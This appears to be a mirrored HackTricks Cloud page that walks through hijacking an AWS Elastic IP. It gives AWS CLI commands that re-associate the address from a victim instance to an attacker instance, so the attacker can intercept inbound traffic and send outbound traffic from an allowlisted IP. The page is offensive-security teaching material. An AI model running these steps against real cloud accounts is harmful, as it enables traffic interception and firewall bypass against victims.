🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

{{#include ../../../../banners/hacktricks-training.md}}

Summary

Abuse ec2:AssociateAddress (and optionally ec2:DisassociateAddress) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker instance/ENI. This redirects inbound traffic destined to the EIP to the attacker and also lets the attacker originate outbound traffic with the allowlisted public IP to bypass external partner firewalls.

Prerequisites

  • Target EIP allocation ID in the same account/VPC.
  • Attacker instance/ENI you control.
  • Permissions:
  • ec2:DescribeAddresses
  • ec2:AssociateAddress on the EIP allocation-id and on the attacker instance/ENI
  • ec2:DisassociateAddress (optional). Note: --allow-reassociation will auto-disassociate from the prior attachment.

Attack

Variables

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1) Allocate or identify the victim’s EIP (lab allocates a fresh one and attaches to victim)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2) Verify the EIP currently resolves to the victim service (example checks for a banner)

curl -sS http://$EIP | grep -i victim

3) Re-associate the EIP to the attacker (auto-disassociates from victim)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4) Verify the EIP now resolves to the attacker service

sleep 5; curl -sS http://$EIP | grep -i attacker

Evidence (moved association):

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
  --query Addresses[0].AssociationId --output text

Impact

  • Inbound impersonation: All traffic to the hijacked EIP is delivered to the attacker instance/ENI.
  • Outbound impersonation: Attacker can initiate traffic that appears to originate from the allowlisted public IP (useful to bypass partner/external source IP filters).

{{#include ../../../../banners/hacktricks-training.md}}